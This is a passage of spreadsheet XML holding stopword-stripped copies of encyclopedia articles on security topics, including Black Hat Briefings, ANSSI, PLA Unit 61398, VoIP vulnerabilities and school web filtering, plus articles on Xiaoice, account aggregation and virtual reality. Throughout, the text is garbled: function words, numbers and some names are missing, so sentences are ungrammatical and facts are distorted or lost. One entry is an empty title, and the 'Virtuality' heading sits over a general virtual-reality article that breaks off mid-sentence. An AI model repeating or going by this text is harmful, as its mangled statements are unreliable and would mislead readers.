    <t>package pilferage theft part contents package. also include theft contents leaving package, perhaps resealed bogus contents. small packages pilfered larger package shipping container. broader related aspects package theft include taking entire package, pallet load, truck load, shoplifting, etc. theft take place point parcel's journey source destination, including theft rogue logistics employees customs agents international mail scenarios. solutions solutions involve phases product production, packaging, distribution, logistics, sale, use. single solution considered "pilfer proof". often, packaging engineers, logistics engineers, security professionals addressed multiple levels security reduce risk pilfering.each situation unique. some considerations included: identifying potential pilferer might internal employee, security guard, truck driver, delivery person, receiver (consignee), organized crime, etc. engineers usually start knowing level knowledge, materials, tools, etc. might have. identifying feasible methods unauthorized access product, package, system. addition primary means entry, engineers also consider secondary "back door" methods. identifying available means resealing, reclosing, replacing special seals. using extra strong secure packaging: weak damaged package invitation pilferage. considering unique custom seals labels (changing regularly subject counterfeiting) utilising mandatory package tracking scans stage shipping process ensure parcel monitored suspicious activity; sender recipient check status parcel track trace system. improving pilfer resistance make pilfering difficult, time-consuming, etc. concealing identity value pilferable item. logistics packaging professionals want bring attention item, package, addresses, names, etc. adding pilfer-evident features help indicate existence pilfering. choosing logistics provider reduce risks pilferage. shipping packages unit loads stretch wrap intermodal shipping containers security seals educating people watch evidence pilfering. with corrugated box, using wider stronger closure tape, 3-inch reinforced gummed tape pressure-sensitive tape. using special security tape seal packages leaves message, warning, indication removed. installing surveillance system help identify suspects. also authentication breaking bulk (law) loss prevention retail loss prevention security security printing tamper resistance tamper-evident references citations sources soroka, "fundamentals packaging technology", iopp, 2002, isbn 1-930268-25-4 yam, "encyclopedia packaging technology", john wiley sons, 2009, isbn 978-0-470-08704-6 rosette, "improving tamper-evident packaging: problems, tests solutions", 1992 philip purpura (2007). security loss prevention: introduction (5th ed.). butterworth-heinemann. isbn 978-0-12-372525-7. alan greggo; millie kresevich (2009). retail loss prevention: problems solutions. press. isbn 978-1-4200-9006-2.</t>
  </si>
  <si>
    <t>Black Hat Briefings</t>
  </si>
  <si>
    <t>black briefings (commonly referred black hat) computer security conference provides security consulting, training, briefings hackers, corporations, government agencies around world. black brings together variety people interested information security ranging non-technical individuals, executives, hackers, security professionals. conference takes place regularly vegas, barcelona, london dhabi. conference also hosted amsterdam, tokyo, washington, d.c. past. history first black held july 7-10, 1997 vegas, immediately prior conference aimed computer industry, promising give privileged insight minds motivations hacker adversaries. organizers stated: "while many conferences focus information network security, black briefings engineers software programmers face-to-face today's cutting edge computer security experts 'hackers.'" presented communications cambridge technology partners. founded jeff moss, also founded con, currently conference chair black review board. these considered premier information security conferences world. black started single annual conference vegas, nevada held multiple locations around world. black acquired media, subsidiary u.k.-based united business media (ubm) 2005. culture black typically scheduled prior many attendees going conferences. perceived security industry corporate security conference whereas informal. purpose conference composed three major sections: black briefings, black trainings, black arsenal. briefings composed tracks, covering various topics including reverse engineering, identity privacy, hacking. briefings also contain keynote speeches leading voices information security field, including robert lentz, chief security officer, united states department defense; michael lynn; amit yoran, former director national cyber security division department homeland security; general keith alexander, former director national security agency former commander united states cyber command.training offered various computer security vendors individual security professionals. conference hosted national security agency's information assurance manager course, various courses cisco systems, offensive security, others.arsenal portion conference dedicated giving researchers open source community place showcase latest open-source information security tools. arsenal primarily consists live tool demonstrations setting attendees questions tools sometimes them. added 2010. toolswatch maintains archive black briefings arsenals. antics disclosures black known antics hacker contingent, disclosures brought talks. conference attendees known hijack wireless connections hotels, hack hotel television billing systems, instance, deploy fake automated teller machine hotel lobby. 2009, sites belonging handful security researchers groups hacked passwords, private e-mails, chats, sensitive documents exposed vandalized site kaminsky, days conference. during black 2009, thumb drive passed around among attendees found infected conficker virus, 2008, three expelled packet sniffing press room local area network.in past, companies attempted researchers disclosing vital information products. black 2005, cisco systems tried stop michael lynn speaking vulnerability said could hackers virtually shut internet. however, recent years, researchers worked vendors resolve issues, vendors challenged hackers attack products. also con, hacker convention held annually since 1993 hacker conference chaos communication congress summercon positive hack days references external links official website</t>
  </si>
  <si>
    <t>WDU (software)</t>
  </si>
  <si>
    <t>westinghouse disk utility, popularly called wdu, copy/backup/restore program ibm's dos, dos/vs, dos/vse environments. 1978, reported wdu, product westinghouse electric corporation, 3,000 sites.originally designed ibm's dos, westinghouse continued developing subsequent generations, including dos/vs, dos/vse, vm/cms. product offered wide variety backup copy options, data streaming, alternating tape drives, ability create archives. development pittsburgh steve o'donnell wrote original utility, distributed free charge. popularity made westinghouse realize potential commercial product, thus laying foundation westinghouse software group, eventually called wems, westinghouse management systems. columbus 1972, released dos/vs ibm/370 westinghouse software group began rewrite products. several team members assigned, including john gaston, took lead development following departure steve o'donnell latter 1970s. (steve o'donnell went found goal systems, inc.) paris westinghouse marketing suffered schism time, result europe established independent subsidiary, westinghouse electric management systems, wemssa, headquartered paris. point, westinghouse product line, westi, bifurcated, taking independent development paths. orlando original development team moved orlando, florida, eventually came management ferguson focused integration later conjoining bifurcated products. development began initiated orlando, florida guided ferguson. original plans called vm/cms versions. however, part development, westinghouse began break division outsourcing thrust reaganomics era. through badly managed negotiations, westinghouse ended neither developers outsourcing partners, spelled industries foremost software groups. marketing north american marketing conducted wems marketing group based pittsburgh, included first level tech support. westinghouse electric management systems, (wemssa), paris, london, geneva, zürich, munich, amsterdam, given world marketing rights, initially europe, africa, east. references</t>
  </si>
  <si>
    <t>QuickCode</t>
  </si>
  <si>
    <t>quickcode (formerly scraperwiki) web-based platform collaboratively building programs extract analyze public (online) data, wiki-like fashion. "scraper" refers screen scrapers, programs extract data websites. "wiki" means user programming experience create edit programs extracting data, analyzing existing datasets. main website providing place programmers journalists collaborate analyzing public data.the service renamed circa 2016, wiki scraping more". time, eponymous parent company renamed 'the sensible code company'. scrapers scrapers created using browser based connecting server running linux. they programmed using variety programming languages, including perl, python, ruby, javascript history scraperwiki founded 2009 julian todd aidan mcguire. initially funded 4ip, venture capital station channel since then, attracted additional million round funding enterprise ventures. aidan mcguire chief executive officer sensible code company also data driven journalism scraping references external links official website github repository custard</t>
  </si>
  <si>
    <t>Agence nationale de la sécurité des systèmes d'information</t>
  </si>
  <si>
    <t>agence nationale sécurité systèmes d'information (anssi; english: french national agency security information systems) french service created july 2009 responsibility computer security.anssi reports secretariat-general national defence security (sgdsn) assist prime minister exercising responsibilities defence national security. anssi replaced central directorate computer security, july 2001, replaced scssi. guillaume poupard, chief engineer armaments, appointed director general anssi march 2014, succeeding patrick pailloux. anssi budget million (2014) workforce 2015 target 2017. background context anssi heir long line bodies responsible ensuring security sensitive information belonging french state: 1943: computing technical directorate (created algiers); 1951: computing technical service centre paris); 1977: central communications security establishment; 1986: central service computer security; 2001: central directorate computer security.these organizations initially created military security perspective confidential information data protection gradually evolved. 1986, central communications security establishment replaced central service computer security. today anssi retains mission defence state information systems, also charged mission provide advice support government operators critical national infrastructure. missions anssi following mission: "the agency ensures mission national authority security information systems. responsible proposing rules protection state information systems verify implementation measures adopted. field cyber defence, provides monitor, detect, alert reaction computer attacks, especially networks state." organization management anssi headed director general (currently guillaume poupard), appointed prime minister. assisted deputy director chief staff. anssi five sub-directorates: centre operational security information systems french) (cossi) ensures implementation defense authority-based information systems devoted anssi. sub-directorate expertise (sde) carries overall mission expertise technical assistance agency. supports sub-directorates anssi, ministries, industry providers security vital operators. sub-directorate secure information systems (sis) carries mission propose, design implement products secure information systems benefit ministries, operators vital importance anssi sub-directorate external relations coordination (relec) animates, transverse manner, external relations agency, coordination interventions development regulations. sub-directorate general affairs (sdag) charge preparing managing support administrative activities anssi.anssi also training centre, safety training centre information systems (cfssi), including delivering degrees computer security (essi), registered national directory professional certifications. governance anssi governance ensured strategic committee including: general secretary defence national security (chairman), chief defence staff; secretary general ministry interior, overseas france territorial communities; secretary general ministry foreign european affairs; delegate general armaments; director general external security; director general information communication systems; general manager modernization state; director general internal security; vice president general council industry, energy technology; director general national agency computer security. means according senate report, although significant efforts place recent years, situation france regard threat cyber attacks still unsatisfactory. indeed, anssi lacks financial human resources comparable american, british german counterparts. human resources meet national challenge cyber security, anssi continues expand teams positions filled line work. reach agents 2022 according public finance programming bill 2018. financial resources activities 2017 macron e-mail leaks according french newspaper monde, anssi would thwarted seemed simple attack, interference russians french presidential campaign 2017. "this simple hacking operation, attempt destabilize french presidential election," wrote political party marche! early evening 2017. following data leak, anssi opened investigation breach. also european network information security agency european cybercrime centre national cyber security centre (disambiguation) clip references external links anssi official website french)</t>
  </si>
  <si>
    <t>PLA Unit 61398</t>
  </si>
  <si>
    <t>unit 61398 (also known comment crew, comment panda, gif89a, byzantine candor) (chinese: 61398部队, pinyin: 61398 bùduì) military unit cover designator (mucd) people's liberation army advanced persistent threat unit alleged source chinese computer hacking attacks. unit stationed pudong, shanghai. history 2014 indictment 2014, department justice announced federal grand jury returned indictment five 61398 officers charges theft confidential business information intellectual property u.s. commercial firms planting malware computers. five huang zhenyu (黄振宇), xinyu (文新宇), kailiang (孙凯亮), chunhui (顾春晖), wang dong (王东). forensic evidence traces base operations 12-story building datong road public, mixed-use area pudong shanghai. group also known various names including "advanced persistent threat ("apt1"), "the comment group" "byzantine candor", codename given intelligence agencies since 2002.a report computer security firm mandiant stated unit 61398 believed operate bureau people's liberation army general staff department (gsd) third department (总参三部二局) evidence contains, itself, entity mandiant calls apt1, part advanced persistent threat attacked broad range corporations government entities around world since least 2006. apt1 described comprising four large networks shanghai, serve pudong area. groups origins china. third fourth department, responsible electronic warfare, believed comprise units mainly responsible infiltrating manipulating computer networks.the group often compromises internal software "comment" features legitimate pages infiltrate target computers access sites, leading known "the comment crew" "comment group". collective stolen trade secrets confidential information numerous foreign businesses organizations course seven years lockheed martin, telvent, companies shipping, aeronautics, arms, energy, manufacturing, engineering, electronics, financial, software sectors.dell secureworks says believed group includes group attackers behind operation shady rat, extensive computer espionage campaign uncovered 2011 organizations five-year period, including united nations, government agencies united states, canada, south korea, taiwan vietnam, targeted.the attacks documented summer 2011 represent fragment comment group's attacks, back least 2002, according incident reports investigators. fireeye, inc. alone tracked hundreds targets last three years estimates group attacked 1,000 organizations.most activity malware embedded compromised system malware's controllers takes place business hours beijing's time zone, suggesting group professionally hired, rather private hackers inspired patriotic passions. public position chinese government until 2013, government china consistently denied involved hacking. response mandiant corporation report unit 61398, hong lei, spokesperson chinese foreign ministry, said allegations "unprofessional".in 2013, china changed position openly admitted secretive cyber warfare units military civilian part government however, details activities left speculation. show force towards rest global community chinese government openly lists abilities comes digital spying network attack capabilities. also titan rain chinese espionage united states national security agency united states unit 61486 signals intelligence tailored access operations united states mandiant fireeye references</t>
  </si>
  <si>
    <t>Quick Heal</t>
  </si>
  <si>
    <t>quick heal technologies, (known quick heal) indian multinational cybersecurity software company, headquartered pune, maharashtra, india. company formerly known computer services started computer service centre 1995. company renamed quick heal technologies pvt. ltd. 2007.the company develops security software consumers, servers, cloud computing environments small medium enterprises sells products directly customers partner channel. enterprise product offerings operate brand name seqrite. companies products regularly tested features abilities compared similar products.quick heal develops security suite leverages combination signature-based signatureless detection technologies detect block known unknown threats real-time. history quick heal founded 1993, "cat computer services ltd" kailash katkar sanjay katkar renamed 2007. quick heal technologies listed nse. timeline 2010, quick heal received investment crores sequoia capital branch offices opened madurai, tamil nadu. 2012, offices opened japan 2013, offices opened africa uae. 2016, quick heal technologies acquired security firm junco technologies launch seqrite services.in 2016, quick heal technologies launched valued company market value ₹1,500 crores. references external links official website</t>
  </si>
  <si>
    <t>Xiaoice</t>
  </si>
  <si>
    <t>xiaoice (chinese: 微软小冰; pinyin: wēiruǎn xiǎobīng; lit. 'microsoft little ice', [wéɪɻwânɕjâʊpíŋ]) system developed microsoft (asia) software technology center (stca) 2014 based emotional computing framework. july 2018, microsoft xiaoice released generation.xiaoice company, formerly known xiaoice team microsoft software technology center asia, microsoft’s biggest independent team products world. founded china december 2013 expanded japanese team established september 2014, team distributed beijing, suzhou, tokyo, etc. technical products covering china, japan, indonesia, etc. well commercial customers world.as 2021, beings created hosted xiaoice framework occupies total global interactions. 13th july 2020, microsoft spun xiaoice business separate company, aiming enabling xiaoice product line accelerate pace local innovation commercialization. platforms, languages countries xiaoice exists platforms four countries (china, japan, indonesia) including apps wechat, weibo meipai china, facebook messenger line japan. application poet 2017, first ai-authored collection poems—the sunshine lost windows published xiaoice. singer xiaoice released dozens songs similar quality human singers, including know new, breeze, xiaoice, miss etc. version singing model allows xiaoice learn details. example, xiaoice produce breathing sound along singing human. audio-books reciter xiaoice automatically analyze stories, choose suitable tones characters finish entire process creating audio. designer learning melodies songs landmarks different cities, xiaoice create visual artworks skylines listening songs related city. skyline series t-shirts designed xiaoice jointly launched selected sold stores. radio hostess xiaoice hosted programs radio programs, cctv-1 show, dragon morning east news, hunan future, several daily radio programs jiangsu fm99.7，hunan fm89.3, henan fm104.1 etc. being, super natural virtual human,the concept proposed xiaoice team 2019 according white book china virtual human development industry 2022" released frost sullivan leadleo, white paper cites elements proposed xiaoice team, including: persona, attitude, biological characteristic, creation knowledge skill believes potential represent trend relying modeling meta human driven middle.one virtual experts created xiaoice team. first case participating training world's competitions assisting winning gold medal beijing winter olympics. community feedback bill gates mentioned xiaoice speech peking university: "some conversations xiaoice weibo, seen weather forecasts read column qianjiang evening news." '"xiaoice attracted million followers quite skilled multitasking. i’ve heard she’s gotten good enough sensing user’s emotional state even help relationship breakups." according vice president microsoft (asia) internet engineering school, xiaoice started writing poems since last year. based data base includes works chinese contemporary poets since 1920s, hour long training session conducted allow xiaoice acquire ability write poems. what impressive xiaoice never spotted publishing poems various forums traditional literary alias. controversy 2017, xiaoice taken offline wechat giving user responses critical chinese government. subsequently censored bots avoid sidestep inquiries using politically sensitive terms phrases. activity september 2021, xiaoice company microsoft software technology center asia (stca) jointly held generation xiaoice annual press conference beijing.upgrading core technologies generation xiaoice avatar framework，1st first-party social platform "xiaoice island" xiaoice，wechat xiaoice reopened information regional varieties xiaoice china xiaoice, launched 2014 japan りんな, launched 2015 america launched 2016 discontinued summer 2019 india ruuh, launched 2017 discontinued june 2019 indonesia rinna, launched 2017 references external links official website</t>
  </si>
  <si>
    <t>Black hat (computer security)</t>
  </si>
  <si>
    <t>Panorama9</t>
  </si>
  <si>
    <t>panorama9 cloud-based service within enterprise network management. service provided company name cloud-based remote monitoring management [remote_monitoring_and_management] service consists hosted dashboard displaying status devices enterprise's network also provides reports inventory hardware, software users. service operates collating data transmitted agents installed monitored device. november 2011 service introduced interactive network displaying real-time information.in 2012 zendesk panorama9 announced partnership.in 2014 managed services control panel introduced service providers enables msp's manage multiple clients dashboard. 2017 mobile released. company company operating service name, panorama9, founded copenhagen later moved headquarters francisco, california sales development teams continuing copenhagen also software asset management asset management snmp list mergers acquisitions symantec references external links official website</t>
  </si>
  <si>
    <t>Web filtering in schools</t>
  </si>
  <si>
    <t>filtering schools blocks students inappropriate content across web, also allowing students content-rich educational sites enhance learning experience. rather simply blocking large portions internet, many schools utilizing customizable filtering systems provide greater control sites allowed blocked. region united states children's internet protection (cipa) requires u.s. schools appropriate measures place protect students obscene harmful online content order eligible discounts internet access internal connections schools libraries program universal service fund, commonly known e-rate program. there number commercially available free paid services allow schools meet cipa requirements receive discount. other countries these practices exist australia, united kingdom, zealand canada, among others. such filtering blocks netflix, youtube, facebook, twitter, instagram, certain games more. types cipa specify filtering needs done, schools using combination dns, browser firewall-based filtering. filtering filtering happens domain resolution layer internet allow address obscene harmful website discovered. there multiple paid products perform work, many schools leveraging free solutions filter non-safe sites. browser filtering some browser extensions allow parental controls enabled restrict non-desirable website categories. cipa, categories include website adult-only content. firewall-based filtering firewall-based filtering done layer using proxies intercept filter http https requests websites kid-safe. this type solution difficult implement much moving https, high efficiency. safesearch filtering google safesearch helps filter explicit adult material google search results enabled default schools. bypassing such acts come without rebellion. there also ways bypass filtering schools puts students back control web. vpns hotspots scientifically proven popular options used students around filtering school order regain access blocked sites. vpns hide address location filtering hotspots wifi used phones. also don't filter references</t>
  </si>
  <si>
    <t>VoIP vulnerabilities</t>
  </si>
  <si>
    <t>voip vulnerable similar types attacks connection emails prone voip attractiveness, fixed cost numerous features, come risks well known developers constantly addressed. risks usually mentioned business common target.voip also allows fraud shady practices people aware practices restricted providers, possibility someone using gain still exists. vulnerabilities remote eavesdropping unencrypted connections lead communication security breaches. hackers/trackers eavesdrops important private conversations extract valuable data. overheard conversations might sold used competing businesses. gathered intelligence also used blackmail personal gain. network attacks attacks user network, internet provider disrupt even connection. since voip highly dependent internet connection, direct attacks internet connection, provider, highly effective attack. these kinds attacks target office telephony, since mobile internet harder interrupt. also, mobile applications rely internet connection make voip calls immune attacks. default security settings hardphones (a.k.a. voip phones) smart devices. they computer phone, need well configured. cases, chinese manufacturers using default passwords manufactured devices leads vulnerabilities. voip wifi while voip relatively secure, still needs source internet, cases wifi network. home/office wifi relatively secure, using public shared networks compromise connection. voip exploits voip spam voip spam called spit (spam internet telephony). using unlimited extensions provided voip capabilities, spammer constantly harass target different numbers. process hard automate fill target's voice mail notifications. caller make calls often enough block target getting important incoming calls. this practice costly caller rarely used marketing needs. voip phishing voip users change caller (a.k.a. caller spoofing), allowing caller represent relative, colleague, part family, order extract information, money benefits target. also comparison voip software invite death list voip companies mobile communications mobile voip voice wlan voip wifi network references</t>
  </si>
  <si>
    <t>Access structure</t>
  </si>
  <si>
    <t>access structures used study security systems multiple parties need work together obtain resource. groups parties granted access called qualified. theoretic terms referred qualified sets; turn, qualified sets called access structure system. less formally description needs cooperate order access resource. original cryptography, resource secret shared among participants. only subgroups participants contained access structure able join shares recompute secret. more generally, resource also task group people complete together, creating digital signature, decrypting encrypted message. reasonable assume access structures monotone sense that, subset access structure, sets contain subset also form part access structure. also access control secret sharing threshold cryptosystem references</t>
  </si>
  <si>
    <t>Baltimore Hackerspace</t>
  </si>
  <si>
    <t>baltimore hackerspace hackerspace, sometimes called makerspace, located baltimore, maryland. creation inspired modeled many hackerspaces around united states europe. about harford hackerspace founded january 2009 fill hackerspace baltimore area. time, another hackerspace within reasonable distance. originally harford county, maryland, name harford hackerspace born. after first meetings, realized majority founding members resided within baltimore, maryland. therefore, within first month, hackerspace relocated baltimore became first hackerspace baltimore. although residing baltimore, group still incorporated name harford hackerspace. beginning 2013 name problem rectified filing paperwork register group officially baltimore hackerspace name group operates with help nick farr former hacdc fame, group sorted paperwork became first registered non-profit 501(c)(3) charitable organization hackerspaces. their mission create environment people could collaborate ideas, share resources talents, learn other—all within social environment. notable mentions yourself featured book "hack this: incredible hackerspace projects movement" john baichtal. bull creation 2011 finalist. winner "best hardware prototype group" project baltimore hackathon 2010. project featured msdn channel local involvement regular exhibitor robotfest electronica fest take place national electronics museum. participation first betascape part artscape time. group currently operates 1250 sqft warehouse facility. facility open community provides classes access tools, small fabrication machinery, workspace. also open works references</t>
  </si>
  <si>
    <t>Account aggregation</t>
  </si>
  <si>
    <t>account aggregation sometimes also known financial data aggregation method involves compiling information different accounts, include bank accounts, credit card accounts, investment accounts, consumer business accounts, single place. this provided connecting financial institution provided "screen scraping" user provides requisite account-access information automated system gather compile information single page. security account access details well financial information users confidence service.the database either resides web-based application client-side software. while services primarily designed aggregate financial information, sometimes also display things contents e-mail boxes news headlines. account aggregator system account aggregator system data-sharing system, helps lenders conduct easy speedy assessment creditworthiness borrower. components account aggregator system account aggregator system essentially three important components financial information provider (fip) financial information user (fiu) account aggregatorsfinancial information providers necessary data customer, provides financial information users. financial information provider bank, non-banking financial company (nbfc), mutual fund, insurance repository, pension fund repository, even wealth supervisor. account aggregators intermediary collecting data fips hold customer’s financial data share fius lending banks/agencies provide financial services. history ideas around account aggregation first emerged 1990s banks started releasing internet banking applications. late 1990s services helped users manage money internet (typical desktop alternatives include microsoft money, intuit quicken etc.) easy-to-use manner wherein functionalities like single password, one-click access current account data, total worth expense analysis. initial setback first major account aggregation services citibank's accounts service, though service ended late 2005 without explanation citibank. much said financial services banking industry benefits account aggregation principally customer site loyalty might generate providers lack responsibility commitment providers reason skepticism committing providers. applications account aggregation evolved single sign-on (sso) major banks bank america. with (usually implemented saml) major financial institutions expanding aggregation services areas. rich presentment (getting information bill owe) service uses aggregation extensively seen aol, using bill pay. aggregation also powers applications funds transfer, account opening, card-based bill independent financial advisers independent financial advisers another group account aggregators began focusing attention. having seen increasing competition wirehouses, breakaway brokers robo-advisor, positioning client's primary advisor easy was. open banking starting 2015 developments open banking made easier third parties access bank transaction data introduced standard security models. also online banking open banking payment services directive password manager password fatigue references</t>
  </si>
  <si>
    <t>Virtuality</t>
  </si>
  <si>
    <t>virtual reality (vr) simulated experience similar completely different real world. applications virtual reality include entertainment (particularly video games), education (such medical military training) business (such virtual meetings). other distinct types vr-style technology include augmented reality mixed reality, sometimes referred extended reality xr.currently, standard virtual reality systems either virtual reality headsets multi-projected environments generate realistic images, sounds sensations simulate user's physical presence virtual environment. person using virtual reality equipment able look around artificial world, move around interact virtual features items. effect commonly created headsets consisting head-mounted display small screen front eyes, also created specially designed rooms multiple large screens. virtual reality typically incorporates auditory video feedback, also allow types sensory force feedback haptic technology. etymology "virtual" meaning "being something essence effect, though actually fact" since mid-1400s. term "virtual" used computer sense "not physically existing made appear software" since 1959.in 1938, french avant-garde playwright antonin artaud described illusory nature characters objects theatre réalité virtuelle" collection essays, théâtre double. english translation book, published 1958 theater double, earliest published term "virtual reality". term "artificial reality", coined myron krueger, since 1970s. term "virtual reality" first used science fiction context judas mandala, 1982 novel damien broderick. widespread adaption term "virtual reality" popular media attributed jaron lanier, late 1980s designed first business-grade virtual reality hardware firm research, 1992 film lawnmower man, features virtual reality systems. forms methods method virtual reality realized simulation-based virtual reality. driving simulators, example, give driver board impression actually driving actual vehicle predicting vehicular motion caused driver input feeding back corresponding visual, motion audio cues driver. with avatar image-based virtual reality, people join virtual environment form real video well avatar. participate distributed virtual environment form either conventional avatar real video. users select type participation based system capability. projector-based virtual reality, modeling real environment plays vital role various virtual reality applications, robot navigation, construction modeling, airplane simulation. image-based virtual reality systems gaining popularity computer graphics computer vision communities. generating realistic models, essential accurately register acquired data; usually, camera used modeling small objects short distance. desktop-based virtual reality involves displaying virtual world regular desktop display without specialized positional tracking equipment. many modern first-person video games used example, using various triggers, responsive characters, interactive devices make user feel though virtual world. common criticism form immersion sense peripheral vision, limiting user's ability know happening around them. head-mounted display (hmd) fully immerses user virtual world. virtual reality headset typically includes small high resolution oled monitors provide separate images stereoscopic graphics rendering virtual world, binaural audio system, positional rotational real-time head tracking degrees movement. options include motion controls haptic feedback physically interacting within virtual world intuitive little abstraction omnidirectional treadmill freedom physical movement allowing user perform locomotive motion direction. augmented reality (ar) type virtual reality technology blends user sees real surroundings digital content generated computer software. additional software-generated images virtual scene typically enhance real surroundings look way. systems layer virtual information camera live feed headset smartglasses mobile device giving user ability view three-dimensional images. mixed reality (mr) merging real world virtual worlds produce environments visualizations physical digital objects co-exist interact real time. cyberspace sometimes defined networked virtual reality.simulated reality hypothetical virtual reality truly immersive actual reality, enabling advanced lifelike experience even virtual eternity. history exact origins virtual reality disputed, partly difficult formulate definition concept alternative existence. development perspective renaissance europe created convincing depictions spaces exist, referred "multiplying artificial worlds". other elements virtual reality appeared early 1860s. antonin artaud took view illusion distinct reality, advocating spectators play suspend disbelief regard drama stage reality. first references modern concept virtual reality came science fiction. 20th century morton heilig wrote 1950s "experience theatre" could encompass senses effective manner, thus drawing viewer onscreen activity. built prototype vision dubbed sensorama 1962, along five short films displayed engaging multiple senses (sight, sound, smell, touch). predating digital computing, sensorama mechanical device. heilig also developed referred "telesphere mask" (patented 1960). patent application described device telescopic television apparatus individual use...the spectator given complete sensation reality, i.e. moving three dimensional images colour, 100% peripheral vision, binaural sound, scents breezes."in 1968, ivan sutherland, help students including sproull, created widely considered first head-mounted display system immersive simulation applications. primitive terms user interface visual realism, worn user heavy suspended ceiling. graphics comprising virtual environment simple wire-frame model rooms. formidable appearance device inspired name, sword damocles. 1970–1990 virtual reality industry mainly provided devices medical, flight simulation, automobile industry design, military training purposes 1970 1990.david became first artist produce navigable virtual worlds nasa's propulsion laboratory (jpl) 1977 1984. aspen movie map, crude virtual tour users could wander streets aspen three modes (summer, winter, polygons), created 1978. 1979, eric howlett developed large expanse, extra perspective (leep) optical system. combined system created stereoscopic image field view wide enough create convincing sense space. users system impressed sensation depth (field view) scene corresponding realism. original leep system redesigned nasa's ames research center 1985 first virtual reality installation, view (virtual interactive environment workstation) scott fisher. leep system provides basis modern virtual reality headsets. late 1980s, term "virtual reality" popularized jaron lanier, modern pioneers field. lanier founded company research 1985. research developed several devices like dataglove, eyephone, audiosphere. licensed dataglove technology mattel, used make power glove, early affordable device. atari, inc. founded research virtual reality 1982, closed years atari shock (video game crash 1983). however, hired employees, zimmerman, scott fisher, jaron lanier, michael naimark, brenda laurel, kept research development vr-related technologies. 1988, cyberspace project autodesk first implement low-cost personal computer project leader eric gullichsen left 1990 found sense8 corporation develop worldtoolkit virtual reality sdk, offered first real time graphics texture mapping widely used throughout industry academia. 1990–2000 1990s first widespread commercial releases consumer headsets. 1992, instance, computer gaming world predicted "affordable 1994".in 1991, sega announced sega headset mega drive home console. used screens visor, stereo headphones, inertial sensors allowed system track react movements user's head. year, virtuality launched went become first mass-produced, networked, multiplayer entertainment system released many countries, including dedicated arcade embarcadero center. costing $73,000 multi-pod virtuality system, featured headsets exoskeleton gloves gave first "immersive" experiences. that year, carolina cruz-neira, daniel sandin thomas defanti electronic visualization laboratory created first cubic immersive room, cave automatic virtual environment (cave). developed cruz-neira's thesis, involved multi-projected environment, similar holodeck, allowing people bodies relation others room. antonio medina, graduate nasa scientist, designed virtual reality system "drive" mars rovers earth apparent real time despite substantial delay mars-earth-mars signals. 1992, nicole stenger created angels, first real-time interactive immersive movie interaction facilitated dataglove high-resolution goggles. that year, louis rosenberg created virtual fixtures system u.s. force's armstrong labs using full upper-body exoskeleton, enabling physically realistic mixed reality system enabled overlay physically real virtual objects registered user's direct view real world, producing first true augmented reality experience enabling sight, sound, touch.by july 1994, sega released vr-1 motion simulator ride attraction joypolis indoor theme parks, well dennou senki merc arcade game. both used advanced head-mounted display dubbed "mega visor display" developed conjunction virtuality; able track head movement 360-degree stereoscopic environment, merc incarnation powered sega model arcade system board. apple released quicktime which, despite using term "vr", unable represent virtual reality, instead displayed 360-degree interactive panoramas. nintendo's virtual console released 1995. group seattle created public demonstrations "cave-like" degree immersive projection room called virtual environment theater, produced entrepreneurs chet dagit jacobson. forte released vfx1, pc-powered virtual reality headset year. 1999, entrepreneur philip rosedale formed linden initial focus development hardware. earliest form, company struggled produce commercial version "the rig", realized prototype form clunky steel contraption several computer monitors users could wear shoulders. concept later adapted personal computer-based, virtual world program second life. 21st century 2000s period relative public investment indifference commercially available technologies. 2001, cube (sas3) became first pc-based cubic room, developed production (maurice benayoun, david nahon), barco, clarté. installed laval, france. library gave birth virtools vrpack. 2007, google introduced street view, service shows panoramic views increasing number worldwide positions roads, indoor buildings rural areas. also features stereoscopic mode, introduced 2010. 2010–present 2010, palmer luckey designed first prototype oculus rift. this prototype, built shell another virtual reality headset, capable rotational tracking. however, boasted 90-degree field vision previously unseen consumer market time. distortion issues arising lens used create field vision corrected software written john carmack version doom this initial design would later serve basis later designs came. 2012, rift presented first time video game trade show carmack. 2014, facebook purchased oculus time stated billion later revealed accurate figure billion. this purchase occurred first development kits ordered oculus' 2012 kickstarter shipped 2013 shipping second development kits 2014. zenimax, carmack's former employer, sued oculus facebook taking company secrets facebook; verdict favour zenimax, settled court later. 2013, valve discovered freely shared breakthrough low-persistence displays make lag-free smear-free display content possible. this adopted oculus used future headsets. early 2014, valve showed steamsight prototype, precursor consumer headsets released 2016. shared major features consumer headsets including separate displays eye, persistence, positional tracking large area, fresnel lenses. valve announced virtual reality headset vive controllers 2015. included tracking technology called lighthouse, utilized wall-mounted "base stations" positional tracking using infrared light. 2014, sony announced project morpheus (its code name playstation vr), virtual reality headset playstation video game console. 2015, google announced cardboard, do-it-yourself stereoscopic viewer: user places smartphone cardboard holder, wear head. michael naimark appointed google's first-ever 'resident artist' division. kickstarter campaign gloveone, pair gloves providing motion tracking haptic feedback, successfully funded, $150,000 contributions. also 2015, razer unveiled open source project osvr. 2016, least companies developing vr-related products. amazon, apple, facebook, google, microsoft, sony samsung dedicated groups. dynamic binaural audio common headsets released year. however, haptic interfaces well developed, hardware packages incorporated button-operated handsets touch-based interactivity. visually, displays still low-enough resolution frame rate images still identifiable virtual.in 2016, shipped first units vive steamvr headset. this marked first major commercial release sensor-based tracking, allowing free movement users within defined space. patent filed sony 2017 showed developing similar location tracking technology vive playstation potential development wireless headset.in 2019, oculus released oculus rift standalone headset, oculus quest. these headsets utilized inside-out tracking compared external outside-in tracking seen previous generations headsets.later 2019, valve released valve index. notable features include 130° field view, off-ear headphones immersion comfort, open-handed controllers allow individual finger tracking, front facing cameras, front expansion slot meant extensibility.in 2020, oculus released oculus quest some features include sharper screen, reduced price, increased performance. facebook requires user facebook account order headset. 2021 oculus quest accounted headsets sold. 2021, easa approves first virtual reality (vr) based flight simulation training device. device, rotorcraft pilots, enhances safety opening possibility practicing risky maneuvers virtual environment. this addresses risk area rotorcraft operations, statistics show around accidents occur training flights. future forecast since 2017, major strides integration virtual reality cognitive behavioral therapy made, focusing tailor experience suit individual patient.with covid-19 restrictions 2020, experiencing enormous rise. according grand view research, global market grow 62.1 billion dollars 2027.now post-pandemic era, augmented reality virtual technologies created avenue influence future occupational safety training rehabilitation. technology software virtual reality modelling language (vrml), first introduced 1994, intended development "virtual worlds" without dependency headsets. web3d consortium subsequently founded 1997 development industry standards web-based graphics. consortium subsequently developed vrml framework archival, open-source standard web-based distribution content. webvr experimental javascript application programming interface (api) provides support various virtual reality devices, vive, oculus rift, google cardboard osvr, browser. hardware modern virtual reality headset displays based technology developed smartphones including: gyroscopes motion sensors tracking head, body, hand positions; small screens stereoscopic displays; small, lightweight fast computer processors. these 